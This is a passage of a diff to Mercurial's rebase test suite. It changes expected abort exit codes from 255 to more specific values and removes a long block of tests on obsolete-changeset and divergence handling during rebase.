$ hg rebase --collapse -d H -s 'B+F' abort: unable to collapse on top of 5, there is more than one external parent: 1, 3 - [255] + [20] $ cd .. With internal merge: @@ -484,7 +484,7 @@ $ hg rebase --keepbranches --collapse -s 1 -d 3 abort: cannot collapse multiple named branches - [255] + [10] $ cd .. 
diff --git a/tests/test-rebase-conflicts.t b/tests/test-rebase-conflicts.t --- a/tests/test-rebase-conflicts.t +++ b/tests/test-rebase-conflicts.t @@ -318,10 +318,10 @@ bundle2-input-part: total payload size 1686 bundle2-input-part: "cache:rev-branch-cache" (advisory) supported bundle2-input-part: total payload size 74 - truncating cache/rbc-revs-v1 to 56 bundle2-input-part: "phase-heads" supported bundle2-input-part: total payload size 24 bundle2-input-bundle: 3 parts total + truncating cache/rbc-revs-v1 to 72 added 2 changesets with 2 changes to 1 files updating the branch cache invalid branch cache (served): tip differs diff --git a/tests/test-rebase-dest.t b/tests/test-rebase-dest.t --- a/tests/test-rebase-dest.t +++ b/tests/test-rebase-dest.t @@ -18,7 +18,7 @@ $ hg rebase abort: you must specify a destination (use: hg rebase -d REV) - [255] + [10] $ hg rebase -d 1 rebasing 2:5db65b93a12b tip "cc" saved backup bundle to $TESTTMP/repo/.hg/strip-backup/5db65b93a12b-4fb789ec-rebase.hg @@ -74,7 +74,7 @@ $ hg pull --rebase abort: rebase destination required by configuration (use hg pull followed by hg rebase -d DEST) - [255] + [10] Setup rebase with multiple destinations @@ -152,7 +152,7 @@ > A D > EOS abort: --collapse does not work with multiple destinations - [255] + [10] Multiple destinations cannot be used with --base: @@ -192,7 +192,7 @@ > Z > EOS abort: rebase destination for f0a671a46792 is not unique - [255] + [10] Destination is an ancestor of source: @@ -204,7 +204,7 @@ > Z > EOS abort: source and destination form a cycle - [255] + [10] BUG: cycles aren't flagged correctly when --dry-run is set: $ rebasewithdag -s B -d 'SRC' --dry-run <<'EOS' @@ -216,7 +216,7 @@ > EOS abort: source and destination form a cycle starting dry-run rebase; repository will not be changed - [255] + [10] Switch roots: @@ -329,7 +329,7 @@ > Z > EOS abort: source and destination form a cycle - [255] + [10] Detect source is ancestor of dest in runtime: @@ -341,7 +341,7 @@ > A > EOS 
abort: source is ancestor of destination - [255] + [10] "Already rebased" fast path still works: diff --git a/tests/test-rebase-interruptions.t b/tests/test-rebase-interruptions.t --- a/tests/test-rebase-interruptions.t +++ b/tests/test-rebase-interruptions.t @@ -350,7 +350,7 @@ M A rebasing 6:a0b2430ebfb8 tip "F" abort: precommit hook exited with status 1 - [255] + [40] $ hg tglogp @ 7: 401ccec5e39f secret 'C' | @@ -401,7 +401,7 @@ transaction abort! rollback completed abort: pretxncommit hook exited with status 1 - [255] + [40] $ hg tglogp @ 7: 401ccec5e39f secret 'C' | @@ -451,7 +451,7 @@ transaction abort! rollback completed abort: pretxnclose hook exited with status 1 - [255] + [40] $ hg tglogp @ 7: 401ccec5e39f secret 'C' | diff --git a/tests/test-rebase-mq.t b/tests/test-rebase-mq.t --- a/tests/test-rebase-mq.t +++ b/tests/test-rebase-mq.t @@ -46,14 +46,14 @@ $ hg rebase -s 1 -d 3 abort: cannot rebase onto an applied mq patch - [255] + [20] Rebase - same thing, but mq patch is default dest: $ hg up -q 1 $ hg rebase abort: cannot rebase onto an applied mq patch - [255] + [20] $ hg up -q qtip Rebase - generate a conflict: diff --git a/tests/test-rebase-named-branches.t b/tests/test-rebase-named-branches.t --- a/tests/test-rebase-named-branches.t +++ b/tests/test-rebase-named-branches.t @@ -247,7 +247,7 @@ $ hg rebase -s 5 -d 6 abort: source and destination form a cycle - [255] + [10] $ hg rebase -s 6 -d 5 rebasing 6:3944801ae4ea "dev-two named branch" diff --git a/tests/test-rebase-newancestor.t b/tests/test-rebase-newancestor.t --- a/tests/test-rebase-newancestor.t +++ b/tests/test-rebase-newancestor.t @@ -154,7 +154,7 @@ rebasing 2:ec2c14fb2984 "dev: f-dev stuff" rebasing 4:4b019212aaf6 "dev: merge default" abort: rebasing 4:4b019212aaf6 will include unwanted changes from 1:1d1a643d390e - [255] + [10] $ cd .. 
@@ -314,7 +314,7 @@ rebasing 6:b296604d9846 E "E" rebasing 7:caa9781e507d F tip "F" abort: rebasing 7:caa9781e507d will include unwanted changes from 4:d6003a550c2c or 3:c1e6b162678d - [255] + [10] The warning does not get printed if there is no unwanted change detected: diff --git a/tests/test-rebase-obsolete.t b/tests/test-rebase-obsolete.t --- a/tests/test-rebase-obsolete.t +++ b/tests/test-rebase-obsolete.t @@ -560,7 +560,7 @@ rebasing 2:b18e25de2cf5 D "D" rebasing 6:f15c3adaf214 F tip "F" abort: cannot rebase 6:f15c3adaf214 without moving at least one of its parents - [255] + [10] $ cd .. @@ -743,1398 +743,3 @@ 1 new orphan changesets $ cd .. - -Skip obsolete changeset even with multiple hops ------------------------------------------------ - -setup - - $ hg init obsskip - $ cd obsskip - $ cat << EOF >> .hg/hgrc - > [experimental] - > rebaseskipobsolete = True - > [extensions] - > strip = - > EOF - $ echo A > A - $ hg add A - $ hg commit -m A - $ echo B > B - $ hg add B - $ hg commit -m B0 - $ hg commit --amend -m B1 - $ hg commit --amend -m B2 - $ hg up --hidden 'desc(B0)' - 0 files updated, 0 files merged, 0 files removed, 0 files unresolved - updated to hidden changeset a8b11f55fb19 - (hidden revision 'a8b11f55fb19' was rewritten as: 261e70097290) - $ echo C > C - $ hg add C - $ hg commit -m C - 1 new orphan changesets - $ hg log -G - @ 4:212cb178bcbb C - | - | o 3:261e70097290 B2 - | | - x | 1:a8b11f55fb19 B0 (rewritten using amend as 3:261e70097290) - |/ - o 0:4a2df7238c3b A - - -Rebase finds its way in a chain of marker - - $ hg rebase -d 'desc(B2)' - note: not rebasing 1:a8b11f55fb19 "B0", already in destination as 3:261e70097290 "B2" - rebasing 4:212cb178bcbb tip "C" - -Even when the chain include missing node - - $ hg up --hidden 'desc(B0)' - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - updated to hidden changeset a8b11f55fb19 - (hidden revision 'a8b11f55fb19' was rewritten as: 261e70097290) - $ echo D > D - $ hg add D - $ hg 
commit -m D - 1 new orphan changesets - $ hg --hidden strip -r 'desc(B1)' - saved backup bundle to $TESTTMP/obsskip/.hg/strip-backup/86f6414ccda7-b1c452ee-backup.hg - 1 new orphan changesets - $ hg log -G - @ 5:1a79b7535141 D - | - | o 4:ff2c4d47b71d C - | | - | o 2:261e70097290 B2 - | | - x | 1:a8b11f55fb19 B0 (rewritten using amend as 2:261e70097290) - |/ - o 0:4a2df7238c3b A - - - $ hg rebase -d 'desc(B2)' - note: not rebasing 1:a8b11f55fb19 "B0", already in destination as 2:261e70097290 "B2" - rebasing 5:1a79b7535141 tip "D" - $ hg up 4 - 1 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo "O" > O - $ hg add O - $ hg commit -m O - $ echo "P" > P - $ hg add P - $ hg commit -m P - $ hg log -G - @ 8:8d47583e023f P - | - o 7:360bbaa7d3ce O - | - | o 6:9c48361117de D - | | - o | 4:ff2c4d47b71d C - |/ - o 2:261e70097290 B2 - | - o 0:4a2df7238c3b A - - $ hg debugobsolete `hg log -r 7 -T '{node}\n'` --config experimental.evolution=true - 1 new obsolescence markers - obsoleted 1 changesets - 1 new orphan changesets - $ hg rebase -d 6 -r "4::" - rebasing 4:ff2c4d47b71d "C" - note: not rebasing 7:360bbaa7d3ce "O", it has no successor - rebasing 8:8d47583e023f tip "P" - -If all the changeset to be rebased are obsolete and present in the destination, we -should display a friendly error message - - $ hg log -G - @ 10:121d9e3bc4c6 P - | - o 9:4be60e099a77 C - | - o 6:9c48361117de D - | - o 2:261e70097290 B2 - | - o 0:4a2df7238c3b A - - - $ hg up 9 - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo "non-relevant change" > nonrelevant - $ hg add nonrelevant - $ hg commit -m nonrelevant - created new head - $ hg debugobsolete `hg log -r 11 -T '{node}\n'` --config experimental.evolution=true - 1 new obsolescence markers - obsoleted 1 changesets - $ hg log -G - @ 11:f44da1f4954c nonrelevant (pruned) - | - | o 10:121d9e3bc4c6 P - |/ - o 9:4be60e099a77 C - | - o 6:9c48361117de D - | - o 2:261e70097290 B2 - | - o 0:4a2df7238c3b A 
- - $ hg rebase -r . -d 10 - note: not rebasing 11:f44da1f4954c tip "nonrelevant", it has no successor - -If a rebase is going to create divergence, it should abort - - $ hg log -G - @ 10:121d9e3bc4c6 P - | - o 9:4be60e099a77 C - | - o 6:9c48361117de D - | - o 2:261e70097290 B2 - | - o 0:4a2df7238c3b A - - - $ hg up 9 - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo "john" > doe - $ hg add doe - $ hg commit -m "john doe" - created new head - $ hg up 10 - 1 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo "foo" > bar - $ hg add bar - $ hg commit --amend -m "10'" - $ hg up 10 --hidden - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - updated to hidden changeset 121d9e3bc4c6 - (hidden revision '121d9e3bc4c6' was rewritten as: 77d874d096a2) - $ echo "bar" > foo - $ hg add foo - $ hg commit -m "bar foo" - 1 new orphan changesets - $ hg log -G - @ 14:73568ab6879d bar foo - | - | o 13:77d874d096a2 10' - | | - | | o 12:3eb461388009 john doe - | |/ - x | 10:121d9e3bc4c6 P (rewritten using amend as 13:77d874d096a2) - |/ - o 9:4be60e099a77 C - | - o 6:9c48361117de D - | - o 2:261e70097290 B2 - | - o 0:4a2df7238c3b A - - $ hg summary - parent: 14:73568ab6879d tip (orphan) - bar foo - branch: default - commit: (clean) - update: 2 new changesets, 3 branch heads (merge) - phases: 8 draft - orphan: 1 changesets - $ hg rebase -s 10 -d 12 - abort: this rebase will cause divergences from: 121d9e3bc4c6 - (to force the rebase please set experimental.evolution.allowdivergence=True) - [255] - $ hg log -G - @ 14:73568ab6879d bar foo - | - | o 13:77d874d096a2 10' - | | - | | o 12:3eb461388009 john doe - | |/ - x | 10:121d9e3bc4c6 P (rewritten using amend as 13:77d874d096a2) - |/ - o 9:4be60e099a77 C - | - o 6:9c48361117de D - | - o 2:261e70097290 B2 - | - o 0:4a2df7238c3b A - -With experimental.evolution.allowdivergence=True, rebase can create divergence - - $ hg rebase -s 10 -d 12 --config 
experimental.evolution.allowdivergence=True - rebasing 10:121d9e3bc4c6 "P" - rebasing 14:73568ab6879d tip "bar foo" - 2 new content-divergent changesets - $ hg summary - parent: 16:61bd55f69bc4 tip - bar foo - branch: default - commit: (clean) - update: 1 new changesets, 2 branch heads (merge) - phases: 8 draft - content-divergent: 2 changesets - -rebase --continue + skipped rev because their successors are in destination -we make a change in trunk and work on conflicting changes to make rebase abort. - - $ hg log -G -r 16:: - @ 16:61bd55f69bc4 bar foo - | - ~ - -Create the two changes in trunk - $ printf "a" > willconflict - $ hg add willconflict - $ hg commit -m "willconflict first version" - - $ printf "dummy" > C - $ hg commit -m "dummy change successor" - -Create the changes that we will rebase - $ hg update -C 16 -q - $ printf "b" > willconflict - $ hg add willconflict - $ hg commit -m "willconflict second version" - created new head - $ printf "dummy" > K - $ hg add K - $ hg commit -m "dummy change" - $ printf "dummy" > L - $ hg add L - $ hg commit -m "dummy change" - $ hg debugobsolete `hg log -r ".^" -T '{node}'` `hg log -r 18 -T '{node}'` --config experimental.evolution=true - 1 new obsolescence markers - obsoleted 1 changesets - 1 new orphan changesets - - $ hg log -G -r 16:: - @ 21:7bdc8a87673d dummy change - | - x 20:8b31da3c4919 dummy change (rewritten as 18:601db7a18f51) - | - o 19:b82fb57ea638 willconflict second version - | - | o 18:601db7a18f51 dummy change successor - | | - | o 17:357ddf1602d5 willconflict first version - |/ - o 16:61bd55f69bc4 bar foo - | - ~ - $ hg rebase -r ".^^ + .^ + ." -d 18 - rebasing 19:b82fb57ea638 "willconflict second version" - merging willconflict - warning: conflicts while merging willconflict! 
(edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - - $ hg resolve --mark willconflict - (no more unresolved files) - continue: hg rebase --continue - $ hg rebase --continue - rebasing 19:b82fb57ea638 "willconflict second version" - note: not rebasing 20:8b31da3c4919 "dummy change", already in destination as 18:601db7a18f51 "dummy change successor" - rebasing 21:7bdc8a87673d tip "dummy change" - $ cd .. - -Divergence cases due to obsolete changesets -------------------------------------------- - -We should ignore branches with unstable changesets when they are based on an -obsolete changeset which successor is in rebase set. - - $ hg init divergence - $ cd divergence - $ cat >> .hg/hgrc << EOF - > [extensions] - > strip = - > [alias] - > strip = strip --no-backup --quiet - > [templates] - > instabilities = '{rev}:{node|short} {desc|firstline}{if(instabilities," ({instabilities})")}\n' - > EOF - - $ hg debugdrawdag <<EOF - > e f - > | | - > d' d # replace: d -> d' - > \ / - > c - > | - > x b - > \| - > a - > EOF - 1 new orphan changesets - $ hg log -G -r 'a':: - * 7:1143e9adc121 f - | - | o 6:d60ebfa0f1cb e - | | - | o 5:027ad6c5830d d' - | | - x | 4:76be324c128b d (rewritten using replace as 5:027ad6c5830d) - |/ - o 3:a82ac2b38757 c - | - | o 2:630d7c95eff7 x - | | - o | 1:488e1b7e7341 b - |/ - o 0:b173517d0057 a - - -Changeset d and its descendants are excluded to avoid divergence of d, which -would occur because the successor of d (d') is also in rebaseset. As a -consequence f (descendant of d) is left behind. 
- - $ hg rebase -b 'e' -d 'x' - rebasing 1:488e1b7e7341 b "b" - rebasing 3:a82ac2b38757 c "c" - rebasing 5:027ad6c5830d d' "d'" - rebasing 6:d60ebfa0f1cb e "e" - note: not rebasing 4:76be324c128b d "d" and its descendants as this would cause divergence - $ hg log -G -r 'a':: - o 11:eb6d63fc4ed5 e - | - o 10:44d8c724a70c d' - | - o 9:d008e6b4d3fd c - | - o 8:67e8f4a16c49 b - | - | * 7:1143e9adc121 f - | | - | | x 6:d60ebfa0f1cb e (rewritten using rebase as 11:eb6d63fc4ed5) - | | | - | | x 5:027ad6c5830d d' (rewritten using rebase as 10:44d8c724a70c) - | | | - | x | 4:76be324c128b d (rewritten using replace as 5:027ad6c5830d) - | |/ - | x 3:a82ac2b38757 c (rewritten using rebase as 9:d008e6b4d3fd) - | | - o | 2:630d7c95eff7 x - | | - | x 1:488e1b7e7341 b (rewritten using rebase as 8:67e8f4a16c49) - |/ - o 0:b173517d0057 a - - $ hg strip -r 8: - $ hg log -G -r 'a':: - * 7:1143e9adc121 f - | - | o 6:d60ebfa0f1cb e - | | - | o 5:027ad6c5830d d' - | | - x | 4:76be324c128b d (rewritten using replace as 5:027ad6c5830d) - |/ - o 3:a82ac2b38757 c - | - | o 2:630d7c95eff7 x - | | - o | 1:488e1b7e7341 b - |/ - o 0:b173517d0057 a - - -If the rebase set has an obsolete (d) with a successor (d') outside the rebase -set and none in destination, we still get the divergence warning. -By allowing divergence, we can perform the rebase. 
- - $ hg rebase -r 'c'::'f' -d 'x' - abort: this rebase will cause divergences from: 76be324c128b - (to force the rebase please set experimental.evolution.allowdivergence=True) - [255] - $ hg rebase --config experimental.evolution.allowdivergence=true -r 'c'::'f' -d 'x' - rebasing 3:a82ac2b38757 c "c" - rebasing 4:76be324c128b d "d" - rebasing 7:1143e9adc121 f tip "f" - 1 new orphan changesets - 2 new content-divergent changesets - $ hg log -G -r 'a':: -T instabilities - o 10:e1744ea07510 f - | - * 9:e2b36ea9a0a0 d (content-divergent) - | - o 8:6a0376de376e c - | - | x 7:1143e9adc121 f - | | - | | * 6:d60ebfa0f1cb e (orphan) - | | | - | | * 5:027ad6c5830d d' (orphan content-divergent) - | | | - | x | 4:76be324c128b d - | |/ - | x 3:a82ac2b38757 c - | | - o | 2:630d7c95eff7 x - | | - | o 1:488e1b7e7341 b - |/ - o 0:b173517d0057 a - - $ hg strip -r 8: - -(Not skipping obsoletes means that divergence is allowed.) - - $ hg rebase --config experimental.rebaseskipobsolete=false -r 'c'::'f' -d 'x' - rebasing 3:a82ac2b38757 c "c" - rebasing 4:76be324c128b d "d" - rebasing 7:1143e9adc121 f tip "f" - 1 new orphan changesets - 2 new content-divergent changesets - - $ hg strip -r 0: - -Similar test on a more complex graph - - $ hg debugdrawdag <<EOF - > g - > | - > f e - > | | - > e' d # replace: e -> e' - > \ / - > c - > | - > x b - > \| - > a - > EOF - 1 new orphan changesets - $ hg log -G -r 'a': - * 8:2876ce66c6eb g - | - | o 7:3ffec603ab53 f - | | - x | 6:e36fae928aec e (rewritten using replace as 5:63324dc512ea) - | | - | o 5:63324dc512ea e' - | | - o | 4:76be324c128b d - |/ - o 3:a82ac2b38757 c - | - | o 2:630d7c95eff7 x - | | - o | 1:488e1b7e7341 b - |/ - o 0:b173517d0057 a - - $ hg rebase -b 'f' -d 'x' - rebasing 1:488e1b7e7341 b "b" - rebasing 3:a82ac2b38757 c "c" - rebasing 5:63324dc512ea e' "e'" - rebasing 7:3ffec603ab53 f "f" - rebasing 4:76be324c128b d "d" - note: not rebasing 6:e36fae928aec e "e" and its descendants as this would cause divergence - $ hg log -G 
-r 'a': - o 13:a1707a5b7c2c d - | - | o 12:ef6251596616 f - | | - | o 11:b6f172e64af9 e' - |/ - o 10:d008e6b4d3fd c - | - o 9:67e8f4a16c49 b - | - | * 8:2876ce66c6eb g - | | - | | x 7:3ffec603ab53 f (rewritten using rebase as 12:ef6251596616) - | | | - | x | 6:e36fae928aec e (rewritten using replace as 5:63324dc512ea) - | | | - | | x 5:63324dc512ea e' (rewritten using rebase as 11:b6f172e64af9) - | | | - | x | 4:76be324c128b d (rewritten using rebase as 13:a1707a5b7c2c) - | |/ - | x 3:a82ac2b38757 c (rewritten using rebase as 10:d008e6b4d3fd) - | | - o | 2:630d7c95eff7 x - | | - | x 1:488e1b7e7341 b (rewritten using rebase as 9:67e8f4a16c49) - |/ - o 0:b173517d0057 a - - -issue5782 - $ hg strip -r 0: - $ hg debugdrawdag <<EOF - > d - > | - > c1 c # replace: c -> c1 - > \ / - > b - > | - > a - > EOF - 1 new orphan changesets - $ hg debugobsolete `hg log -T "{node}" --hidden -r 'desc("c1")'` - 1 new obsolescence markers - obsoleted 1 changesets - $ hg log -G -r 'a': --hidden - * 4:76be324c128b d - | - | x 3:ef8a456de8fa c1 (pruned) - | | - x | 2:a82ac2b38757 c (rewritten using replace as 3:ef8a456de8fa) - |/ - o 1:488e1b7e7341 b - | - o 0:b173517d0057 a - - $ hg rebase -d 0 -r 2 - rebasing 2:a82ac2b38757 c "c" - $ hg log -G -r 'a': --hidden - o 5:69ad416a4a26 c - | - | * 4:76be324c128b d - | | - | | x 3:ef8a456de8fa c1 (pruned) - | | | - | x | 2:a82ac2b38757 c (rewritten using replace as 3:ef8a456de8fa rewritten using rebase as 5:69ad416a4a26) - | |/ - | o 1:488e1b7e7341 b - |/ - o 0:b173517d0057 a - - $ cd .. 
- -Rebase merge where successor of one parent is equal to destination (issue5198) - - $ hg init p1-succ-is-dest - $ cd p1-succ-is-dest - - $ hg debugdrawdag <<EOF - > F - > /| - > E D B # replace: D -> B - > \|/ - > A - > EOF - 1 new orphan changesets - - $ hg rebase -d B -s D - note: not rebasing 2:b18e25de2cf5 D "D", already in destination as 1:112478962961 B "B" - rebasing 4:66f1a38021c9 F tip "F" - $ hg log -G - o 5:50e9d60b99c6 F - |\ - | | x 4:66f1a38021c9 F (rewritten using rebase as 5:50e9d60b99c6) - | |/| - | o | 3:7fb047a69f22 E - | | | - | | x 2:b18e25de2cf5 D (rewritten using replace as 1:112478962961) - | |/ - o | 1:112478962961 B - |/ - o 0:426bada5c675 A - - $ cd .. - -Rebase merge where successor of other parent is equal to destination - - $ hg init p2-succ-is-dest - $ cd p2-succ-is-dest - - $ hg debugdrawdag <<EOF - > F - > /| - > E D B # replace: E -> B - > \|/ - > A - > EOF - 1 new orphan changesets - - $ hg rebase -d B -s E - note: not rebasing 3:7fb047a69f22 E "E", already in destination as 1:112478962961 B "B" - rebasing 4:66f1a38021c9 F tip "F" - $ hg log -G - o 5:aae1787dacee F - |\ - | | x 4:66f1a38021c9 F (rewritten using rebase as 5:aae1787dacee) - | |/| - | | x 3:7fb047a69f22 E (rewritten using replace as 1:112478962961) - | | | - | o | 2:b18e25de2cf5 D - | |/ - o / 1:112478962961 B - |/ - o 0:426bada5c675 A - - $ cd .. 
- -Rebase merge where successor of one parent is ancestor of destination - - $ hg init p1-succ-in-dest - $ cd p1-succ-in-dest - - $ hg debugdrawdag <<EOF - > F C - > /| | - > E D B # replace: D -> B - > \|/ - > A - > EOF - 1 new orphan changesets - - $ hg rebase -d C -s D - note: not rebasing 2:b18e25de2cf5 D "D", already in destination as 1:112478962961 B "B" - rebasing 5:66f1a38021c9 F tip "F" - - $ hg log -G - o 6:0913febf6439 F - |\ - +---x 5:66f1a38021c9 F (rewritten using rebase as 6:0913febf6439) - | | | - | o | 4:26805aba1e60 C - | | | - o | | 3:7fb047a69f22 E - | | | - +---x 2:b18e25de2cf5 D (rewritten using replace as 1:112478962961) - | | - | o 1:112478962961 B - |/ - o 0:426bada5c675 A - - $ cd .. - -Rebase merge where successor of other parent is ancestor of destination - - $ hg init p2-succ-in-dest - $ cd p2-succ-in-dest - - $ hg debugdrawdag <<EOF - > F C - > /| | - > E D B # replace: E -> B - > \|/ - > A - > EOF - 1 new orphan changesets - - $ hg rebase -d C -s E - note: not rebasing 3:7fb047a69f22 E "E", already in destination as 1:112478962961 B "B" - rebasing 5:66f1a38021c9 F tip "F" - $ hg log -G - o 6:c6ab0cc6d220 F - |\ - +---x 5:66f1a38021c9 F (rewritten using rebase as 6:c6ab0cc6d220) - | | | - | o | 4:26805aba1e60 C - | | | - | | x 3:7fb047a69f22 E (rewritten using replace as 1:112478962961) - | | | - o---+ 2:b18e25de2cf5 D - / / - o / 1:112478962961 B - |/ - o 0:426bada5c675 A - - $ cd .. 
- -Rebase merge where successor of one parent is ancestor of destination - - $ hg init p1-succ-in-dest-b - $ cd p1-succ-in-dest-b - - $ hg debugdrawdag <<EOF - > F C - > /| | - > E D B # replace: E -> B - > \|/ - > A - > EOF - 1 new orphan changesets - - $ hg rebase -d C -b F - rebasing 2:b18e25de2cf5 D "D" - note: not rebasing 3:7fb047a69f22 E "E", already in destination as 1:112478962961 B "B" - rebasing 5:66f1a38021c9 F tip "F" - note: not rebasing 5:66f1a38021c9 F tip "F", its destination already has all its changes - $ hg log -G - o 6:8f47515dda15 D - | - | x 5:66f1a38021c9 F (pruned using rebase) - | |\ - o | | 4:26805aba1e60 C - | | | - | | x 3:7fb047a69f22 E (rewritten using replace as 1:112478962961) - | | | - | x | 2:b18e25de2cf5 D (rewritten using rebase as 6:8f47515dda15) - | |/ - o / 1:112478962961 B - |/ - o 0:426bada5c675 A - - $ cd .. - -Rebase merge where successor of other parent is ancestor of destination - - $ hg init p2-succ-in-dest-b - $ cd p2-succ-in-dest-b - - $ hg debugdrawdag <<EOF - > F C - > /| | - > E D B # replace: D -> B - > \|/ - > A - > EOF - 1 new orphan changesets - - $ hg rebase -d C -b F - note: not rebasing 2:b18e25de2cf5 D "D", already in destination as 1:112478962961 B "B" - rebasing 3:7fb047a69f22 E "E" - rebasing 5:66f1a38021c9 F tip "F" - note: not rebasing 5:66f1a38021c9 F tip "F", its destination already has all its changes - - $ hg log -G - o 6:533690786a86 E - | - | x 5:66f1a38021c9 F (pruned using rebase) - | |\ - o | | 4:26805aba1e60 C - | | | - | | x 3:7fb047a69f22 E (rewritten using rebase as 6:533690786a86) - | | | - | x | 2:b18e25de2cf5 D (rewritten using replace as 1:112478962961) - | |/ - o / 1:112478962961 B - |/ - o 0:426bada5c675 A - - $ cd .. 
- -Rebase merge where extinct node has successor that is not an ancestor of -destination - - $ hg init extinct-with-succ-not-in-dest - $ cd extinct-with-succ-not-in-dest - - $ hg debugdrawdag <<EOF - > E C # replace: C -> E - > | | - > D B - > |/ - > A - > EOF - - $ hg rebase -d D -s B - rebasing 1:112478962961 B "B" - note: not rebasing 3:26805aba1e60 C "C" and its descendants as this would cause divergence - - $ cd .. - - $ hg init p2-succ-in-dest-c - $ cd p2-succ-in-dest-c - -The scenario here was that B::D were developed on default. B was queued on -stable, but amended before being push to hg-committed. C was queued on default, -along with unrelated J. - - $ hg debugdrawdag <<EOF - > J - > | - > F - > | - > E - > | D - > | | - > | C # replace: C -> F - > | | H I # replace: B -> H -> I - > | B |/ - > |/ G - > A - > EOF - 1 new orphan changesets - -This strip seems to be the key to avoid an early divergence warning. - $ hg --config extensions.strip= --hidden strip -qr H - 1 new orphan changesets - - $ hg rebase -b 'desc("D")' -d 'desc("J")' - abort: this rebase will cause divergences from: 112478962961 - (to force the rebase please set experimental.evolution.allowdivergence=True) - [255] - -Rebase merge where both parents have successors in destination - - $ hg init p12-succ-in-dest - $ cd p12-succ-in-dest - $ hg debugdrawdag <<'EOS' - > E F - > /| /| # replace: A -> C - > A B C D # replace: B -> D - > | | - > X Y - > EOS - 1 new orphan changesets - $ hg rebase -r A+B+E -d F - note: not rebasing 4:a3d17304151f A "A", already in destination as 0:96cc3511f894 C "C" - note: not rebasing 5:b23a2cc00842 B "B", already in destination as 1:058c1e1fb10a D "D" - rebasing 7:dac5d11c5a7d E tip "E" - abort: rebasing 7:dac5d11c5a7d will include unwanted changes from 3:59c792af609c, 5:b23a2cc00842 or 2:ba2b7fa7166d, 4:a3d17304151f - [255] - $ cd .. - -Rebase a non-clean merge. One parent has successor in destination, the other -parent moves as requested. 
- - $ hg init p1-succ-p2-move - $ cd p1-succ-p2-move - $ hg debugdrawdag <<'EOS' - > D Z - > /| | # replace: A -> C - > A B C # D/D = D - > EOS - 1 new orphan changesets - $ hg rebase -r A+B+D -d Z - note: not rebasing 0:426bada5c675 A "A", already in destination as 2:96cc3511f894 C "C" - rebasing 1:fc2b737bb2e5 B "B" - rebasing 3:b8ed089c80ad D "D" - - $ rm .hg/localtags - $ hg log -G - o 6:e4f78693cc88 D - | - o 5:76840d832e98 B - | - o 4:50e41c1f3950 Z - | - o 2:96cc3511f894 C - - $ hg files -r tip - B - C - D - Z - - $ cd .. - - $ hg init p1-move-p2-succ - $ cd p1-move-p2-succ - $ hg debugdrawdag <<'EOS' - > D Z - > /| | # replace: B -> C - > A B C # D/D = D - > EOS - 1 new orphan changesets - $ hg rebase -r B+A+D -d Z - rebasing 0:426bada5c675 A "A" - note: not rebasing 1:fc2b737bb2e5 B "B", already in destination as 2:96cc3511f894 C "C" - rebasing 3:b8ed089c80ad D "D" - - $ rm .hg/localtags - $ hg log -G - o 6:1b355ed94d82 D - | - o 5:a81a74d764a6 A - | - o 4:50e41c1f3950 Z - | - o 2:96cc3511f894 C - - $ hg files -r tip - A - C - D - Z - - $ cd .. - -Test that bookmark is moved and working dir is updated when all changesets have -equivalents in destination - $ hg init rbsrepo && cd rbsrepo - $ echo "[experimental]" > .hg/hgrc - $ echo "evolution=true" >> .hg/hgrc - $ echo "rebaseskipobsolete=on" >> .hg/hgrc - $ echo root > root && hg ci -Am root - adding root - $ echo a > a && hg ci -Am a - adding a - $ hg up 0 - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo b > b && hg ci -Am b - adding b - created new head - $ hg rebase -r 2 -d 1 - rebasing 2:1e9a3c00cbe9 tip "b" - $ hg log -r . # working dir is at rev 3 (successor of 2) - 3:be1832deae9a b (no-eol) - $ hg book -r 2 mybook --hidden # rev 2 has a bookmark on it now - bookmarking hidden changeset 1e9a3c00cbe9 - (hidden revision '1e9a3c00cbe9' was rewritten as: be1832deae9a) - $ hg up 2 && hg log -r . 
# working dir is at rev 2 again - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - 2:1e9a3c00cbe9 b (rewritten using rebase as 3:be1832deae9a) (no-eol) - $ hg rebase -r 2 -d 3 --config experimental.evolution.track-operation=1 - note: not rebasing 2:1e9a3c00cbe9 mybook "b", already in destination as 3:be1832deae9a tip "b" -Check that working directory and bookmark was updated to rev 3 although rev 2 -was skipped - $ hg log -r . - 3:be1832deae9a b (no-eol) - $ hg bookmarks - mybook 3:be1832deae9a - $ hg debugobsolete --rev tip - 1e9a3c00cbe90d236ac05ef61efcc5e40b7412bc be1832deae9ac531caa7438b8dcf6055a122cd8e 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - -Obsoleted working parent and bookmark could be moved if an ancestor of working -parent gets moved: - - $ hg init $TESTTMP/ancestor-wd-move - $ cd $TESTTMP/ancestor-wd-move - $ hg debugdrawdag <<'EOS' - > E D1 # rebase: D1 -> D2 - > | | - > | C - > D2 | - > | B - > |/ - > A - > EOS - $ hg update D1 -q - $ hg bookmark book -i - $ hg rebase -r B+D1 -d E - rebasing 1:112478962961 B "B" - note: not rebasing 5:15ecf15e0114 book D1 tip "D1", already in destination as 2:0807738e0be9 D2 "D2" - 1 new orphan changesets - $ hg log -G -T '{desc} {bookmarks}' - @ B book - | - | x D1 - | | - o | E - | | - | * C - | | - o | D2 - | | - | x B - |/ - o A - -Rebasing a merge with one of its parent having a hidden successor - - $ hg init $TESTTMP/merge-p1-hidden-successor - $ cd $TESTTMP/merge-p1-hidden-successor - - $ hg debugdrawdag <<'EOS' - > E - > | - > B3 B2 # amend: B1 -> B2 -> B3 - > |/ # B2 is hidden - > | D - > | |\ - > | B1 C - > |/ - > A - > EOS - 1 new orphan changesets - - $ eval `hg tags -T '{tag}={node}\n'` - $ rm .hg/localtags - - $ hg rebase -r $D -d $E - rebasing 5:9e62094e4d94 "D" - - $ hg log -G - o 7:a699d059adcf D - |\ - | o 6:ecc93090a95c E - | | - | o 4:0dc878468a23 B3 - | | - o | 1:96cc3511f894 C - / - o 0:426bada5c675 A - -For some reasons 
